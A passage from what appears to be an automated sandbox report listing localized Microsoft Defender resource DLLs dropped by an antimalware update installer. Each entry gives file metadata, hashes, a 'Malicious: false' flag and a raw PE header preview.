Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................S.....@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	5.4939020981100315
Encrypted:	false
SSDEEP:	1536:OEH8Kt3U5Pfr9Y5BKqpdmXD6pyFJz1Z9YRHPdE:OKRmpYCmmXXZ9YdS
MD5:	381A9FC19B05718037AA3A552715C54F
SHA1:	01DC93DA9A279EBAC49E7564035849AE3EF4B151
SHA-256:	EA4DDE3088A05BA4A894FB81A8ABF0769DB0A8F79F9D1E5E96BEB916610710C4
SHA-512:	423EDF0088AAF42334F097F7687D964E27293AB508AABDD5A3FF7A2F89E9AB4145FE7BE9FC9E0A00C450F8DBABA2F841252EA9A8A0F7845090E84AA17E5BD34A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31480
Entropy (8bit):	4.903514449361369
Encrypted:	false
SSDEEP:	768:7rf5229Ah0vyaffaXQQOvR8PMFXNJSMbsHrWzxWaNnmeduHJJ17CpR1PPGLh:n5229Ah0vyaffaXQQOvR8PMFXNJSMbsT
MD5:	16C6FFA34E0C59EE77F916EBF9148AFC
SHA1:	C82E4308AC0A909BF4387B86B62320DA9E1FEF51
SHA-256:	6EE8E608A103E991460B51D87AEFCA126EC8744642559B536F70330A848CFB08
SHA-512:	782A0BEE60D339B86A176201C84A8AE117458C1688AF3D0089696ED8124E2006676A91C15E117904FE1FBBF6E4F72D248E75086E9E24436E16CFE458E8521A8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........X...........................................................@.......................................... ..@U...........Z... ...........................................................................................rdata..p...........................@..@.rsrc...@U... ...V..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..xP...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75000
Entropy (8bit):	4.68621286355812
Encrypted:	false
SSDEEP:	1536:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfGujCCaCa52HPJ:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfH
MD5:	53B61803FB8BDC469ED5D04FB8983233
SHA1:	FB801EDEB5CCBE9E75C2CBA7A28FF05BFEEA270F
SHA-256:	BE1609A94963D07A591C7D38947B28AE79A9D070385E70BD594A1DBD6DF7EB31
SHA-512:	678F7D40E6F54A481353FF0C7AA1C21FAEC66C8B05546CF9AC4B2372EED51918A53A0D4509C12A7DC6B8B2175A86C19C84C5274735560AA2B62B97347A5E2790
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................... ............@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60152
Entropy (8bit):	4.994721555651978
Encrypted:	false
SSDEEP:	768:7rpd0tgeGeGsnEstzuFtGFil0a9+R1PEcz3:OgTsnPtzuFtGFil0i+HPF
MD5:	9B6F194F0D0EB1ED21B000E07B0CBDCD
SHA1:	FB2E6FF6B553B1E25C142FBD5CF868B98A0E8C2F
SHA-256:	E1A7E2391FFF39162293DD3AE201ADC393D8CC91E83A4B33C2C9A089EE69D203
SHA-512:	F64454892E8E12A33A887CE930A6DFD708CDDD1F76CFEFD909D5AA6ECF0098DB49AC263F4DD2C601A7A12FEC6221F806C4035A5EC8C928CC785550D644720EB0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................(.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	5.453443722839373
Encrypted:	false
SSDEEP:	384:7rqYFfMlN2vyRBNd/gy0b5DYpOLjNB4Okn8OM3mnUJOeTPn5yLOe0FZQiJZhFD7a:7rP6EBZa2z6R1PV/rF
MD5:	222D67D112493530069E47CD64364BAF
SHA1:	F4F6F74D62470C5301BDC537ADC451FEAFBCCEBD
SHA-256:	B6E4B5BF805802069890DF5FD769D48F370620E607809E48E233C78EFE6F90F1
SHA-512:	4A8EEA2ADEDFC1E7267E13F369F50E17AE2A578E28CC15C248F54444925D0196F509F8FF16E8011DC30EB28A8A3E9620F0716E27B50D6933B1283433BF2A88F3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........V.......................................................^....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-GB\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.25269307683972
Encrypted:	false
SSDEEP:	768:7rSJb3XsmqEiqcTr247sEBhEChEehELQRQ4hEYDGR1PYq:qJb3XDqZqc/7skv7rfGHPYq
MD5:	8DE66C308CA2A9340CC9E84F753FAA56
SHA1:	8D70F8339E74BD7730E0E876D3B23412CCB1DA63
SHA-256:	AE6A41CA40A926287BCC94503AC9AD42568D6BB62B4CF2DF60F0599FA9E988FF
SHA-512:	E0E6D0919E21049618E23F7850F83015A9EBB2A802EED22A9ED547421552F3BD2AD3B76BBC66966BA935EF5A152B235EB4A4D5C60379CCA4A2223D5514674ED6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.0955466583627835
Encrypted:	false
SSDEEP:	384:7rTHD0EhR32NSWS8/W5RDBRJqH24rlGsQhJ+:7rbYhtMR1P26LQ
MD5:	DD65190763621E8E1B642A4305D5E801
SHA1:	D9BCFD1CBDC637B9F1211BADEF89F55B8C19D1E3
SHA-256:	8CBEC55311F2B7234D1FBD9C46AB6CF33A165610960132FE73C19FF725579658
SHA-512:	C51D7DC6B9410AFE72BD2C65989469FFF3ED6B41C5D5C9ED1320EEAD78742B840CED18C2B479DB06959B9DF69F28C116B047AE8D4A5ABBF3AB9546713E878C7D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........J...............................................p......R.....@.......................................... ...F...........L... ...........................................................................................rdata..p...........................@..@.rsrc....F... ...H..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HA...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59128
Entropy (8bit):	4.293356301291751
Encrypted:	false
SSDEEP:	768:7rxiJbyt33aEhrdTTm147vXahEzhEthEGQRQwhE3DbR1PR:5iJbytHa6rdd7vM+4ImbHPR
MD5:	BC78A3B5260E268C292724EA573194F9
SHA1:	02D4A4E683609B5B61834520D27B138EF3F9F7C4
SHA-256:	2C4B8F48370B6ADEA49A21F2D89F2400E54C3EE937120152B50A94FFE5F5F7A9
SHA-512:	985B104584656A099A5C20C85C77488D2575CA518353DF585B99E37B0596A46BFF5C32DF197A823569BF6909755406C48B9D41861A1C4A947BF1FE616519AF90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51944
Entropy (8bit):	4.448866330393985
Encrypted:	false
SSDEEP:	384:7rsorOioFEr4H1n3/Dtkby/g1mwhqfB9hyINcNkHoal34Y0wNl8yWucBW+RDBRJD:7rcBH1/b4Y0wNl8Cc5R1PeX8
MD5:	0D87F3932078B4049523B8CDD3EE5692
SHA1:	EA172545FB8E872BE0FC9AF0B58C3FA8CAF6F970
SHA-256:	46022C8F7CC601BF73D231C213612BFAED0E95A76BC510DA08B7323EC1CCB2EE
SHA-512:	51CFF3304353B5992D63C2F0C1CA71ACD74E3A4E8EF009B525BD6720BA4BCEA83A212516E41E086AFDB74E7A36DE0E4674517CAD84D8EB2E7545E34773D35554
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}(....@.......................................... ..$................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52456
Entropy (8bit):	4.449895321849691
Encrypted:	false
SSDEEP:	768:7rypn9K/Gd67WzUi+YXCujpbemXuQx/Vhjhxp1ZR1P4M8/GQT:ap9KOPZXC+XLjZHPQ/x
MD5:	57DD5DCD626332FA892BF1526D09C1D9
SHA1:	B0D2C0D3CC46C7E7F560D11117C5DD7C2817AF5C
SHA-256:	385171BD15127FB8546EF4378CBEA2BF25F5063E6E731DFEB4EF868829FB25B9
SHA-512:	4F59C6E5DE864D07A675ECA116AB308C25CFA67EBB8345376FC98ECEFDA49CBF0BFD96A7371E398EC661E7F546C84C49D6E98556F767B32432E03BFFED04C278
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	5.027883032614938
Encrypted:	false
SSDEEP:	384:7rHwnD0qkg1Wl+R0UdhR3ZVdZFzd4SWS8/WNRDBRJbQl5c:7rQnYqkg1Wl+R0U7VXFzdOIR1PbT
MD5:	FEA5726C8962F98A3601E47EADB5A3E9
SHA1:	FDDCB373EEC6E22B7706A588CDDA4F0822237538
SHA-256:	FC18C509866893EB03BC82F49C0EF07C344640CF8D6FA3963247ABB7521A4A56
SHA-512:	CB63D5656B1822668285B6C1B1594BBE1B364EF45AC4C5618D7C436C93BD38623B06140383DE58A610EA7FEB92BB741AC7477AAB104A0CCBF671125D2D83CA5C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........H...............................................p............@.......................................... ...E...........J... ...........................................................................................rdata..p...........................@..@.rsrc....E... ...F..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@A...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\endpointdlp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	647416
Entropy (8bit):	6.2677434000059975
Encrypted:	false
SSDEEP:	12288:RE74OZLauRb4Z7W42oza9hIXTzq+g57U2ibvko43Shu/6U:toLauRaWMTPg9U2ibcH3SU
MD5:	BBDFA9DA2F8E10903C095F504A2188B1
SHA1:	E670D3739742A460C8C3AA5A2CC911A4ACFEFA8D
SHA-256:	4B3DE446F41D0410C06E9FAFF8823D380BCBDADB5B381C702CE3A5E2535A7142
SHA-512:	A30280A65726142551F2CBFB3A41337B309BDBEABCF710B5654CBD1415453AD2D69A7EC7C753A4E297557755D4204CABA4881938F805E667888523CD99F338FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M2`..S...S...S...!...S...S..S...!...S...!..+S...!...S...!...S...&...S...&..XS...&...S...&...S..Rich.S..........................PE..d...+s.P.........." ......... ......`M...............................................\|....`A............................................................(....`...K....... ...........G..p.......................(.......8............................................text............................... ..`.rdata...m.......p..................@..@.data....9... ...0... ..............@....pdata...K...`...P...P..............@..@.rsrc...(...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.139143013850931
Encrypted:	false
SSDEEP:	768:7r690VA3iN3v240ynoFXuAQ8UyCNbHQSfr+FABZgdTypKR1PJl:iyHGyoFXXfW7Q2r+FAodTypKHPJl
MD5:	B6A28B3D905B28545AC4EC448846C6F4
SHA1:	C59E0A7600A0A76B25B46A7B5D1574BA09FC6826
SHA-256:	89404202E75E8D03AF2458906D9622C7ECD43F4B30180B079B143B77EA6BA6A4
SHA-512:	650319B0A81FB5A1BACE4760C14BA37245A9FB23F4A7E5B18B3BE279A5EDF5063BB1CF5C8631AEC30ACEDCF3F92219B63279A4B01DA80C21B2182C88F56F9158
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}.....@.......................................... ..h................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58616
Entropy (8bit):	4.347687086754615
Encrypted:	false
SSDEEP:	768:7ruyfm07DjkGDxibCs79eoh9ewh/6L3NM6MAM8rbrubOezWyi4JzOcfQT/ZsH+KY:5H6BJdLd0dZLTOy+JdVfQT/eNNTvHPtW
MD5:	1CEB1C751D2CF63A0856B30A74486565
SHA1:	7D388EF3D300849D5E08FFA8F37DBB72765EED9B
SHA-256:	4421F31079246BD5A8B2C76B305BD88251DE81DAA0DBFDC393ACE55198B58F34
SHA-512:	00929E60E67BB9ABD2D4081D387B13D25D819DDCEFABE3384C0FB70C47566FE675499768C1455DDAB7480D1696F956A2448DF1064E7A9DA72085F04A19EE39B9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................H.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	5.483586719154938
Encrypted:	false
SSDEEP:	768:7ruKwQ1QknY/H+2N+HLuwaJDMR/oHyXhIomrCi6EwmAVzR1PMJ:mKwTTHyPag4twc6zHPMJ
MD5:	1933FC68D4038B5431F7CB7AE468F393
SHA1:	E235F2EF1DD1656E1646AD15527C3D1E8AA4DDB0
SHA-256:	961DF898ABCAC1F2911002445BFC624327BC153874D5E3E7556E467B360A55E2
SHA-512:	1C9A1EEA8AE0A8DA611920CFD8010B585BE74DFBA8F3430828E0B3267BF6126E8158B4714A85F57C351B02D8009468A5EB13027E1E7FAF33D4FC4424BBEA7120
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................L.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	4.917070528485799
Encrypted:	false
SSDEEP:	384:7rqG15z+i+7W7n++XyKTDQfOWS8/WzRDBRJ5l5ppJM:7rLBiKTDQLGR1PrHM
MD5:	2FDE66202B0916607183D62E68CFB1B5
SHA1:	2525D696877DB1F0C13ADF15174BB219466F5782
SHA-256:	AF712FBC07C22C3950C81F0F207EC5CB078591E16857DE6373ACDE71B814305E
SHA-512:	D0606A25CF2581FE11E0A122AA080A639D3E69BA8EF2B3A21F6F4985E2D2275C530DDBF6FAFB23D20AE99D7FA4B6D5895F5CD7EDF2A1723BED96B0D919C5FBE3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........T.......................................................`....@.......................................... ..<Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc...<Q... ...R..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-MX\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66808
Entropy (8bit):	4.12608368962796
Encrypted:	false
SSDEEP:	768:7rJ90VX3iN3vpSnynoFXuAQ8UqVaFUk6s3vmxZZL1M+J0R1P6zE:xyAUyoFXXvk/Jvmxr1M+J0HPAE
MD5:	D1CBA62B76E5E851B8922EABFF2DEF6D
SHA1:	E5776BFACF829F2254D9421646AAF9E59A68FDEF
SHA-256:	1F9767C1C1EFE0C4D19D0F22C8FA6ADB60E4E88013CF8112D0BC60608EDDEE5C
SHA-512:	BE116298568BACF0A55637B39DBD5D7866EAEDA94448A0D866228104885B80CAFE47BF552B0B927E06E434BB3F922B06BAD51A16D547EF0F44CF9BAF066C0525
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................N....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-MX\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	4.874668095617591
Encrypted:	false
SSDEEP:	384:7rTJmsPXPLe/MvLyWF4eGOWS8/WFRDBRJw+TEQmDWlGszRnh1Rm:7r95PrF4bL4R1Pwf1zOpm
MD5:	D69771B02DB93D6F6E8A343978F499A7
SHA1:	671655DDAA4F02398C8C0FF41E03E30593C54562
SHA-256:	9FCBDA0A30314F5A45CB005475AC90FFDC60585EF7816CBE691544F1E2299BA1
SHA-512:	BE6556B9D1D0B87E37BEC666C31292EAB99F7A33AAB2981B7AB933A3071585EE0CAA2544E16F394C3DBEC8F0338BE39D2EBC366EC7B373482D5B5791C557AAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........V......................................................=.....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\et-EE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60136
Entropy (8bit):	4.279972277616321
Encrypted:	false
SSDEEP:	384:7r4lfeNOqeYwPyTvYH3ZhKFcnxwOjCIpD/smvDRJ1Y3NabzczgUpUoU+IV0NROTI:7rVNOqz43S2Dbp5xKoU4R1Pky5sJ
MD5:	97EDA100F26EAF8E95056AE742554177
SHA1:	E50DC2B9160F012316FE1E6F471741D872368574
SHA-256:	A326D66D07ED074A9494E53193584BB675C29CA70198A14C9ADBA3CE8CBC3BBB
SHA-512:	76D18333AF20CB4A11839052952406E2667C03C0414F5A7215EA50258B75321451FEBAC38340D980DCC5F6404EAA19F95969498CB15A299B0D9CF6EC9BCBF40D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..p................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\et-EE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	4.980025498831489
Encrypted:	false
SSDEEP:	384:7rvaiEvMcb+v7owbUG7m5OqulPyk8Nq5HjWS8/WRRDBRJb1ghl95x:7rCi+q5kkR1Pb6zx
MD5:	FB98D0BE2991E0FE20A069D56CD23B42
SHA1:	24E503AEE7CDFA8F93B40B32774870B6D6E8E8A8
SHA-256:	ACC123176D10917CDF790A10081628D31E7AACEC9C8ECDC97A44E3A6E3C25080
SHA-512:	1758E536F858666BC38AF0272EFBCBAAD54259105F40FF07A07F70E29AB890166B8D8DA0AB1C10253C5B2BB68831FAD9B7F34BEEF25C457B455848AD7194E41F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\eu-ES\mpuxagent.dll.mui Download File
